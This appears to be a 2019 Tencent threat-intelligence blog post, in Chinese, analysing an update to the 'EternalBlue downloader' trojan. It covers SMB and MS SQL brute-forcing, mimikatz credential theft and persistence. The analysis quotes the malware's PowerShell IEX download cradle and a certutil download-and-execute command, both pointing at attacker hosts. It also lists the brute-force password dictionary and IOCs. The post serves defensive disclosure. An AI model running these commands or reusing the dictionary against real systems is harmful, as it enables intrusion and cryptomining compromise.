产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec DDos防护
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
等保合规服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
运维解决方案
品牌保护解决方案
高防云主机安全
腾讯安心平台解决方案
行业解决方案
游戏行业安全方案
电商行业安全方案
零售行业安全方案
安全专项解决方案
勒索病毒专项解决方案
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
考试入口
证书查询
开启你的安全之旅
联系我们
寻求市场合作
友情链接
腾讯云
未登录- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
正文打不死的小强:永恒之蓝下载器木马又双叒叕升级了新的攻击方式
2019-02-27 07:56:03
一、背景
腾讯御见威胁情报中心于2019年2月25日发现曾利用驱动人生公司升级渠道发起供应链攻击的永恒之蓝下载器木马再次更新。此次更新任然在攻击模块,在此前新增MS SQL爆破攻击的基础上,更新爆破密码字典,然后将使用mimikatz搜集登录密码并添加到字典,并利用该字典进行SMB爆破攻击、MS SQL爆破攻击。同添加了永恒之蓝漏洞攻击后木马启动代码、攻击进程执行状态检查代码,并尝试对木马文件添加签名认证。
这个“永恒之蓝”木马下载器黑产团伙自供应链攻击得手之后,一直很活跃,期间不断更新调整木马攻击方式,蠕虫式传播的特点不断增强。
以下是该团伙主要活动情况的时间线:
|
2018年12月14日 |
利用“驱动人生”系列软件升级通道下发,利用“永恒之蓝”漏洞攻击传播。 |
|
2018年12月19日 |
下发之后的木马新增PowerShell后门安装。 |
|
2019年1月09日 |
检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 |
|
2019年1月24日 |
木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装PowerShell后门。 |
|
2019年2月10日 |
将攻击模块打包方式改为Pyinstaller. |
|
2019年2月20日 |
更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 |
|
2019年2月23日 |
攻击方法再次更新,新增MS SQL爆破攻击。 |
|
2019年2月25日 |
在2月23日基础上继续更新,更新MS SQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 |
二、样本信息
Md5:0a4dcd170708f785f314c16797baaddb
文件路径:C:\Windows\Temp\svchost.exe
计划任务:DnsScan
文件数字签名:“Shenzhen Smartspace Software technology Co.,Limited”
三、样本分析
主程序代码长度对比:2月23日更新后为1888行,2月25日更新后为1909行。
(新增代码1)
爆破时使用密码字典新增密码:
'4yqbm4,m`~!@~#$%^&*(),.;'
'A123456'
使用mimiktaz搜集登录密码并添加到该密码字典中
利用该密码字典进行SMB爆破攻击
利用该密码字典进行MsSQL爆破攻击,攻击成功后添加账户:k8h3d,修改MS SQL超级管理员密码为: “ksa8hd4,m@~#$%^&*()”,并将通过MS SQL程序及1433端口进入计算机的防火墙规则设置为允许通过。
MS SQL爆破成功后安装Bluetooths计划任务执行PowerShell后门:
powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" (解密字符:powershell -ep bypass –e IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN))
同时通过Certutil命令下载母体木马植入:
certutil -urlcache -split -f hxxp://dl.haqo.net/dll.exe?fr=MS SQL c:\\setupinstalled.exe&&c:\\setupinstalled.exe
(新增代码2)
在永恒之蓝漏洞攻击之成功并且植入木马后,添加通过服务方式启动植入木马installed.exe的代码
(新增代码3)
添加并执行函数eb(),检查攻击模块执行状态
四、安全建议
1.服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
3.使用杀毒软件拦截可能的病毒攻击;
4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
IOCs
Md5
0a4dcd170708f785f314c16797baaddb
弱密码字典
123456,
password,
qwerty,
12345678,
123456789,
123,
1234,
123123,
12345,
12345678,
123123123,
1234567890,
88888888,
111111111,
000000,
111111,
112233,
123321,
654321,
666666,
888888,
a123456,
123456a,
5201314,
1qaz2wsx,
1q2w3e4r,
qwe123,
123qwe,
a123456789,
123456789a,
baseball,
dragon,
football,
iloveyou,
password,
sunshine,
princess,
welcome,
abc123,
monkey,
!@#$%^&*,
charlie,
aa123456,
Aa123456,
admin,
homelesspa,
password1,
1q2w3e4r5t,
qwertyuiop,
1qaz2wsx,
sa,
sasa,
sa123,
sql2005,
1,
admin@123,
sa2008,
1111,
passw0rd,
abc,
abc123,
abcdefg,
sapassword,
Aa12345678,
ABCabc123,
sqlpassword,
1qaz2wsx,
1qaz!QAZ,
sql2008,
ksa8hd4,m@~#$%^&*(),
4yqbm4,m`~!@~#$%^&*(),.; ,
4yqbm4,m`~!@~#$%^&*(),.;,
A123456
在线咨询